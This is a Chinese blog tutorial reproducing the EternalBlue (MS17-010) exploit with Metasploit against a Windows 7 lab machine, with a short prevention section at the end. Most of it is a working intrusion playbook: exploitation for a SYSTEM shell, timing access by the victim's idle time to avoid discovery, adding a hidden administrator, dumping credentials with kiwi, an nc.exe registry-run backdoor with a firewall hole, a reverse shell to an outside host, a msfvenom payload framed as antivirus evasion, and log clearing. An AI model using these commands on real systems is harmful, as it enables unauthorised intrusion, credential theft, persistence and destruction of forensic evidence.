本文主要是介绍Kali-MSF-永恒之蓝漏洞复现(ms17_010_eternalblue),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
目录
一、漏洞利用
1.主机发现
2.msf拿取shell
3.获取屏幕
4.文件上传
5.文件下载
6.远程登录
7.上传后门
nc利用
法一:目标主动(推荐)
法二:目标被动(该方法需要msf协助,有点本末倒置)
8.免杀
9.清除日志
二、预防策略
1.打开防火墙
2.安装杀毒软件
3.禁用445端口
使用防火墙新增规则,禁用端口
关闭server服务
关闭不必要的服务
4.IPsec关闭高危端口
添加筛选器列表
添加筛选器操作
编辑 添加成功
5.注册表关闭445端口
6.打补丁
实验环境:windows7
首先关闭防火墙
目标靶机ip地址为192.168.31.89
一、漏洞利用
1.主机发现
nmap -sP 192.168.31.0/24
2.msf拿取shell
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.31.89
run
输入shell,拿到系统权限,再输入chcp 65001解决乱码
3.获取屏幕
meterpreter > screenshot #屏幕截图
4.文件上传
新建文件
upload user.txt c://
5.文件下载
download c://1.txt
6.远程登录
使用命令打开目标靶机的3389端口,远程登录端口
meterpreter > run post/windows/manage/enable_rdp //启用目标主机的3389端口远程桌面
meterpreter > idletime //查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。
rdesktop 192.168.31.89
创建一个用户
meterpreter > shell #进入命令行
net user kill 123 /add #新建用户kill 密码123
net localgroup administrators kill /add #将用户kill添加到Win7的本地管理员组中,获得管理员权限
net user #查看用户
使用kiwi模块查看登录密码
meterpreter > load kiwi //加载kiwi模块
Loading extension kiwi...Success.
creds_all #列举所有凭据
exit #退出
连接成功
但是这里有个问题,就是创建一个账户并登录后会挤掉原本的账户登录
7.上传后门
上传“瑞士军刀”,保证随时可以建立shell连接
upload /usr/share/windows-binaries/nc.exe C:\\Windows
这里强调要上传的Windows目录也就是系统自带目录,否则后门连接会因权限不足或切换账号而失败
nc利用
法一:目标主动(推荐)
向注册表中插入一条记录,使得目标靶机开机后启动nc.exe,将7777端口暴露
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 4444 -e cmd.exe'
加入防火墙规则,以保证目标机开启防火墙后仍然可以访问到后门
netsh firewall add portopening TCP 4444 "kill" ENABLE ALL
成功连接后门
法二:目标被动(该方法需要msf协助,有点本末倒置)
客户端
nc -lnvp 1234 #开启本地1234端口监听反弹过来的shell
服务端
使用msf强行将shell反弹到kali
nc.exe -e cmd.exe 192.168.1.2 1234 #将cmd.exe发送到kali的1234端口
8.免杀
使用msf的msfvenom木马生成功能生成
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.4.7.139 lport=4444 -f exe -o shell.exe
#将shell反弹到kali的4444端口
upload /usr/share/windows-binaries/nc.exe c:\\Windows\\addins
upload shell.exe c:\\Windows\\addins
可以看到360和火绒都可以查杀出来
9.清除日志
查看系统日志
meterpreter > clearev
可以看到日志被清除
二、预防策略
- 打开防火墙,安装杀毒软件。
- 关闭445端口及不必要的服务。
-
安装对应补丁。
1.打开防火墙
打开防火墙后永恒之蓝漏洞将无法被利用
打不进去
2.安装杀毒软件
安装杀毒软件后,例如火绒或者360会自动帮你打补丁,并且会把nc后门给自动屏蔽杀掉
3.禁用445端口
使用防火墙新增规则,禁用端口
防火墙->高级设置->入站规则->新建规则
关闭server服务
WIN+R 运行--services.msc
关闭不必要的服务
比如 网络发现、文件传输、共享、打印、远程连接、远程桌面。
4.IPsec关闭高危端口
在“开始”菜单选择“运行”,输入“gpedit.msc”后回车,打开本地组策略编辑器。依次展开“计算机配置—windows设置—安全设置—ip安全策略,在 本地计算机”,右键创建ip安全策略:
添加筛选器列表
添加筛选器操作
添加成功
5.注册表关闭445端口
注册表方式关闭445端口,还有防火墙规则方式,cmd命令提示行关闭等等。
WIN+R 运行--regedit 进入注册表:
找到注册表项“HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters”
选择“Parameters”项,右键单击,选择“新建”——“DWORD值”。(64位 32位根据自己系统需求)
这里选64位
将DWORD值重命名为“SMBDeviceEnabled”
右键修改"数值数据"的值为0(0代表关闭,1代表打开),点击确定,完成设置 。
最后重启电脑即可关闭445端口。
6.打补丁
补丁网站
Microsoft Update Catalog
这篇关于Kali-MSF-永恒之蓝漏洞复现(ms17_010_eternalblue)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!